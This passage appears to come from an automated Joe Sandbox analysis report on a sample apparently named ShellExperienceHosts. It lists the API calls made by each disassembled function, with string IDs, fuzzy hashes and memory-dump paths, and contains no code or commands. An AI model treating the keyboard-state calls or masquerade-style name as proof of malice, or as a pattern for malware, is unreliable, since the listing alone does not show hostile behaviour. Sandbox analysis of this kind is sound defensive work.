                                                                            • Instruction Fuzzy Hash: D0314EB1950E35EAF722AFB48C887553EE6EB4A365B188516E414D72B4FB71C0C1CF50
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C6E64AB
                                                                            • GetClassNameW.USER32(?,?,000000FF), ref: 6C6E6505
                                                                            • IsAppThemed.UXTHEME(?,?,00000001,?), ref: 6C6E6596
                                                                            • GetStockObject.GDI32(00000005), ref: 6C6E65A7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ClassH_prolog3_NameObjectStockThemed
                                                                            • String ID: Button$Static
                                                                            • API String ID: 2434646892-2498952662
                                                                            • Opcode ID: 8e72177156069195adde10abc9bc5264a0738c74bf55a85df6c5eec076831f20
                                                                            • Instruction ID: 781ef7990f4dfe82eeacac45a330c9a71e7980bd8eea1efa93ee13528f0e2b3e
                                                                            • Opcode Fuzzy Hash: 8e72177156069195adde10abc9bc5264a0738c74bf55a85df6c5eec076831f20
                                                                            • Instruction Fuzzy Hash: 5B31E271A4A21DDBDF24CF54C948BD97370AF19318F1042AA9619DBAC1DB30EA84CF69
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C7EA826
                                                                              • Part of subcall function 6C7EA910: __EH_prolog3.LIBCMT ref: 6C7EA917
                                                                              • Part of subcall function 6C7EA910: GetProfileIntW.KERNEL32(windows,DragMinDist,00000002), ref: 6C7EA96A
                                                                              • Part of subcall function 6C7EA910: GetProfileIntW.KERNEL32(windows,DragDelay,000000C8), ref: 6C7EA980
                                                                            • CopyRect.USER32(?,?), ref: 6C7EA85B
                                                                            • GetCursorPos.USER32(?), ref: 6C7EA86D
                                                                            • SetRect.USER32(?,?,?,?,?), ref: 6C7EA880
                                                                            • IsRectEmpty.USER32(?), ref: 6C7EA89B
                                                                            • InflateRect.USER32(?,00000002,00000002), ref: 6C7EA8AD
                                                                            • DoDragDrop.OLE32(00000000,00000000,?,?), ref: 6C7EA8F5
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Profile$CopyCursorDragDropEmptyH_prolog3H_prolog3_Inflate
                                                                            • String ID:
                                                                            • API String ID: 1837043813-0
                                                                            • Opcode ID: 41979d252a3fcca6624f3d9108ce65f34a9071211a98bd7fed268449552fae30
                                                                            • Instruction ID: 71da99eb2e02041446065c40590249cc20d6af0e5f4e93a33abfab0e96ae1643
                                                                            • Opcode Fuzzy Hash: 41979d252a3fcca6624f3d9108ce65f34a9071211a98bd7fed268449552fae30
                                                                            • Instruction Fuzzy Hash: E4313971A016199FDF11DFE5CA88DED7BB9FF49348B404029E815AB744CB34AE0ACB91
                                                                            APIs
                                                                            • GetAsyncKeyState.USER32(00000012), ref: 6C7ECFF2
                                                                            • GetAsyncKeyState.USER32(00000012), ref: 6C7ED010
                                                                            • GetKeyboardState.USER32(?,?,?,6C8F4D88), ref: 6C7ED042
                                                                            • GetKeyboardLayout.USER32(?), ref: 6C7ED055
                                                                            • MapVirtualKeyW.USER32(?,00000000), ref: 6C7ED060
                                                                            • ToUnicodeEx.USER32(?,00000000,?,?,00000002,00000001,00000000), ref: 6C7ED07B
                                                                            • CharUpperW.USER32(?,?,?,6C8F4D88), ref: 6C7ED091
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: State$AsyncKeyboard$CharLayoutUnicodeUpperVirtual
                                                                            • String ID:
                                                                            • API String ID: 298839909-0
                                                                            • Opcode ID: a327034af1dd9e21df7de60280b89005a5eed67dc3d101bbfaba316d19ed0ca1
                                                                            • Instruction ID: 392db7d9c9cfc5d1f1d56e4d7ca53083d2c90b4ea150b806ca549d8fc587af57
                                                                            • Opcode Fuzzy Hash: a327034af1dd9e21df7de60280b89005a5eed67dc3d101bbfaba316d19ed0ca1
                                                                            • Instruction Fuzzy Hash: A921D771600109ABDB209B64CE49FEDB7BCAF69748F440075F141E7480EFB0A985DB94
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Destroy$AcceleratorH_prolog3ParentTable
                                                                            • String ID:
                                                                            • API String ID: 2502036937-0
                                                                            • Opcode ID: fab37676c349a731023d5f0eec5e626b281cdb88d7937b8cb81e409faaa263cc
                                                                            • Instruction ID: 213c502b0439a0038a66335ad2e70b645fdb56cc266d94c03b2dafe9c0b0c4ae
                                                                            • Opcode Fuzzy Hash: fab37676c349a731023d5f0eec5e626b281cdb88d7937b8cb81e409faaa263cc
                                                                            • Instruction Fuzzy Hash: 792190716003059BDB119F61CA88BAE76B6BF86318F150518E866A7E42DB70E806CB6C
                                                                            APIs
                                                                            • RealChildWindowFromPoint.USER32(?,?,?,?,?), ref: 6C7A0CC9
                                                                            • ClientToScreen.USER32(?,?), ref: 6C7A0CE3
                                                                            • GetWindow.USER32(?,00000005), ref: 6C7A0D35
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ChildClientFromPointRealScreen
                                                                            • String ID:
                                                                            • API String ID: 2518355518-0
                                                                            • Opcode ID: d7bcc8584ddd98870bffc851adb5c9542c327b20dadad8d52141b8ec9947e60a
                                                                            • Instruction ID: b2936885d5caa6b39f59e2c01f70097e3ab142aa0d37a15bca2276f2ef6c89b7
                                                                            • Opcode Fuzzy Hash: d7bcc8584ddd98870bffc851adb5c9542c327b20dadad8d52141b8ec9947e60a
                                                                            • Instruction Fuzzy Hash: 4B118771A0165AABCF11DFA4C909AEF77B8AF4A305B104635F412E3140DB34ED46CB91
                                                                            APIs
                                                                            • IsWindow.USER32(00000000), ref: 6C73C995
                                                                            • FindResourceW.KERNEL32(?,00000000,AFX_DIALOG_LAYOUT,?,?,?,?,?,6C6E5A65,?,?), ref: 6C73C9BD
                                                                            • SizeofResource.KERNEL32(?,00000000,?,?,?,?,?,6C6E5A65,?,?), ref: 6C73C9CF
                                                                            • LoadResource.KERNEL32(?,00000000,?,?,?,?,?,6C6E5A65,?,?), ref: 6C73C9DB
                                                                            • LockResource.KERNEL32(00000000,?,?,?,?,?,6C6E5A65,?,?), ref: 6C73C9E6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$FindLoadLockSizeofWindow
                                                                            • String ID: AFX_DIALOG_LAYOUT
                                                                            • API String ID: 2582447065-2436846380
                                                                            • Opcode ID: a0c93df6ab57e8ae0f06f38d5362ca9c438e269f02cbc1ddf1c7b7d35f15dee5
                                                                            • Instruction ID: e1e1118f85c36be5452ff3ce3f94635dcf289ca215572e90395020d7ca4941ec
                                                                            • Opcode Fuzzy Hash: a0c93df6ab57e8ae0f06f38d5362ca9c438e269f02cbc1ddf1c7b7d35f15dee5
                                                                            • Instruction Fuzzy Hash: 4811C271700234AFEB21AB748D4CE6B76BCFB452DAB100635A80AC2601EBB4DC04C7A2
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: H_prolog3
                                                                            • String ID: AQUA_$BLACK_$BLUE_$IDX_OFFICE2007_STYLE$SILVER_
                                                                            • API String ID: 431132790-2717817858
                                                                            • Opcode ID: b63a5371c0edaa0231cf03e0405c1b94073674d9d11958037c353420440cba8a
                                                                            • Instruction ID: a59d6ffb438fd6088b6095bd01b48aa49c8cad95a7b41772d56e8f084ae2b1ec
                                                                            • Opcode Fuzzy Hash: b63a5371c0edaa0231cf03e0405c1b94073674d9d11958037c353420440cba8a
                                                                            • Instruction Fuzzy Hash: C91108729020099BCB00DFA8CB15AFD7779AF81318F144225A5219BFC0DB70DA09D729
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,10017C00,00000008,100098EA,00000000,00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C), ref: 100097F3
                                                                            • __lock.LIBCMT ref: 10009827
                                                                              • Part of subcall function 1000C144: __mtinitlocknum.LIBCMT ref: 1000C15A
                                                                              • Part of subcall function 1000C144: __amsg_exit.LIBCMT ref: 1000C166
                                                                              • Part of subcall function 1000C144: EnterCriticalSection.KERNEL32(00000000,00000000,?,100099BA,0000000D,10017C28,00000008,10009AB1,00000000,?,10007711,00000000,10017B60,00000008,10007776,?), ref: 1000C16E
                                                                            • InterlockedIncrement.KERNEL32(?), ref: 10009834
                                                                            • __lock.LIBCMT ref: 10009848
                                                                            • ___addlocaleref.LIBCMT ref: 10009866
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                            • String ID: KERNEL32.DLL
                                                                            • API String ID: 637971194-2576044830
                                                                            • Opcode ID: 2fd8a646381f8c1273ec5aa8b514110e131a74dbccaeb09b5e4df53804c3848b
                                                                            • Instruction ID: 89763b3cff33ace5d26e8772c174daa1abf762224351bfae7625883661725aa5
                                                                            • Opcode Fuzzy Hash: 2fd8a646381f8c1273ec5aa8b514110e131a74dbccaeb09b5e4df53804c3848b
                                                                            • Instruction Fuzzy Hash: 1A016D75804B00DFE320DF69C84574ABBE0EF41361F14890EE49A9B3A5CBB4F680CB55
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,6C6E463F,?,?,?,?), ref: 6C7A2E11
                                                                            • GetProcAddress.KERNEL32(00000000,RegisterApplicationRecoveryCallback), ref: 6C7A2E21
                                                                            • EncodePointer.KERNEL32(00000000,?,?,6C6E463F,?,?,?,?), ref: 6C7A2E2A
                                                                            • DecodePointer.KERNEL32(00000000,?,?,6C6E463F,?,?,?,?), ref: 6C7A2E38
                                                                            Strings
                                                                            • RegisterApplicationRecoveryCallback, xrefs: 6C7A2E1B
                                                                            • kernel32.dll, xrefs: 6C7A2E0C
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                            • String ID: RegisterApplicationRecoveryCallback$kernel32.dll
                                                                            • API String ID: 2061474489-202725706
                                                                            • Opcode ID: 328c32c6300f79e7d93ca85fdd2d0712b28d74609d30b888f5262f120612de2a
                                                                            • Instruction ID: d85627b3e983572b52a919417ceec0edf9454a8f32dd46d9779725550792049b
                                                                            • Opcode Fuzzy Hash: 328c32c6300f79e7d93ca85fdd2d0712b28d74609d30b888f5262f120612de2a
                                                                            • Instruction Fuzzy Hash: 3DF06D3174521AAB8F226FA69E0C85B3F78AB467997000631FD19D6620C734D852DBE1
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(shell32.dll,?,?,6C7A215D,?,00000000,6C89BA48,00000000,?,6C6DC013,?), ref: 6C7A2F83
                                                                            • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 6C7A2F93
                                                                            • EncodePointer.KERNEL32(00000000,?,6C7A215D,?,00000000,6C89BA48,00000000,?,6C6DC013,?), ref: 6C7A2F9C
                                                                            • DecodePointer.KERNEL32(00000000,?,?,6C7A215D,?,00000000,6C89BA48,00000000,?,6C6DC013,?), ref: 6C7A2FAA
                                                                             Memory Dump Source
                                                                             • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                            • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                            • API String ID: 2061474489-2320870614
                                                                            • Opcode ID: 262083d05b0d8865f8c3ca78c6fe9d976b732c02050c36eb5cf65e5086e45405
                                                                            • Instruction ID: afb0bded4c311854c77d7a1cb7a93bf612ba08442158381beac943ce4b9941ca
                                                                            • Opcode Fuzzy Hash: 262083d05b0d8865f8c3ca78c6fe9d976b732c02050c36eb5cf65e5086e45405
                                                                            • Instruction Fuzzy Hash: FEF09A3170521AAB8F215FA69E0C85A3BB9AB4A3993010631FC19E6620C734DC52DBE1
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,6C6E4623,?,?), ref: 6C7A2DB2
                                                                            • GetProcAddress.KERNEL32(00000000,RegisterApplicationRestart), ref: 6C7A2DC2
                                                                            • EncodePointer.KERNEL32(00000000,?,?,6C6E4623,?,?), ref: 6C7A2DCB
                                                                            • DecodePointer.KERNEL32(00000000,?,?,6C6E4623,?,?), ref: 6C7A2DD9
                                                                             Memory Dump Source
                                                                             • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                            • String ID: RegisterApplicationRestart$kernel32.dll
                                                                            • API String ID: 2061474489-1259503209
                                                                            • Opcode ID: 693e77fd679a60cf80b7a926785061e41e15285ca205353ea74b8b8da2bf7e8b
                                                                            • Instruction ID: 3f7d396cabf4ab44966485080905f086a15ada1dcf47711a55a43bf80a553232
                                                                            • Opcode Fuzzy Hash: 693e77fd679a60cf80b7a926785061e41e15285ca205353ea74b8b8da2bf7e8b
                                                                            • Instruction Fuzzy Hash: 86F08232741216AB9F215BA69E0C96A3B789F8679A7000632FC09E6615DB34DC42DBE4
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(user32.dll,?,?,6C6F32AF,00000323,00000001,?,00000004,6C6D4B05), ref: 6C7A2F27
                                                                            • GetProcAddress.KERNEL32(00000000,ChangeWindowMessageFilter), ref: 6C7A2F37
                                                                            • EncodePointer.KERNEL32(00000000,?,?,6C6F32AF,00000323,00000001,?,00000004,6C6D4B05), ref: 6C7A2F40
                                                                            • DecodePointer.KERNEL32(00000000,?,?,6C6F32AF,00000323,00000001,?,00000004,6C6D4B05), ref: 6C7A2F4E
                                                                             Memory Dump Source
                                                                             • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                            • String ID: ChangeWindowMessageFilter$user32.dll
                                                                            • API String ID: 2061474489-2498399450
                                                                            • Opcode ID: ecf3974197f3c817846872f1df3346f8227e5347ed5f3de94580040f253f85fe
                                                                            • Instruction ID: 736b116d7fb3df7308dfcb193daef15e2ab3b65b4010f2b9e854b9ab7663c196
                                                                            • Opcode Fuzzy Hash: ecf3974197f3c817846872f1df3346f8227e5347ed5f3de94580040f253f85fe
                                                                            • Instruction Fuzzy Hash: FEF05E31705215EB8B316BA68E0CC1A3B78EB4B6993010632FC1AD2610D734D812DBE5
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,6C6E465E,00000000), ref: 6C7A2E76
                                                                            • GetProcAddress.KERNEL32(00000000,ApplicationRecoveryInProgress), ref: 6C7A2E86
                                                                            • EncodePointer.KERNEL32(00000000,?,?,6C6E465E,00000000), ref: 6C7A2E8F
                                                                            • DecodePointer.KERNEL32(00000000,?,?,6C6E465E,00000000), ref: 6C7A2E9D
                                                                             Memory Dump Source
                                                                             • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                            • String ID: ApplicationRecoveryInProgress$kernel32.dll
                                                                            • API String ID: 2061474489-2899047487
                                                                            • Opcode ID: 171c04c3355da36309ff3ae6196a68866136c9bfcd0202cbcd0d955889e4d118
                                                                            • Instruction ID: 30a1cdab3487de280a17e66408081f86be65b5329b618792a98e2f2e5f887b32
                                                                            • Opcode Fuzzy Hash: 171c04c3355da36309ff3ae6196a68866136c9bfcd0202cbcd0d955889e4d118
                                                                            • Instruction Fuzzy Hash: 5AF0A731B45215AB8B316BA59A0C81B3A7C5B8A79A3000631FC19D7710D734DC92CBE1
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,6C6E46A1,00000001), ref: 6C7A2ED2
